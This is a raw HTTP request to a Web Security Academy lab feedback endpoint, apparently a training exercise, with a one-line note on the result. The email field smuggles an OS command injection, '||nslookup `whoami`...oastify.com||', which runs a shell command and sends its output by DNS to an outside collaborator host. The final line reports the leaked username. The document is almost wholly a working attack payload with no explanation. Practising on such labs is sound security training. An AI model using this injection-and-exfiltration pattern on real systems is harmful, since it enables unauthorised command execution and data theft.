POST /feedback/submit HTTP/2
Host: 0aef001b04ad59b6807ee942005c00d5.web-security-academy.net
Cookie: session=xMylXNh2KkOgU0t2vcZc5zTGrnRHNNli
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Origin: https://0aef001b04ad59b6807ee942005c00d5.web-security-academy.net
Referer: https://0aef001b04ad59b6807ee942005c00d5.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

csrf=NR7juHeUzY8uWuSTIYVMAzZmmcUsqTM5&name=d&email=dsds%40gmail.com||nslookup+`whoami`ma043zrzx96c9thyaat66qqlocu2ir.oastify.com||&subject=d&message=d


The response has the whoami output : peter-SnVcSP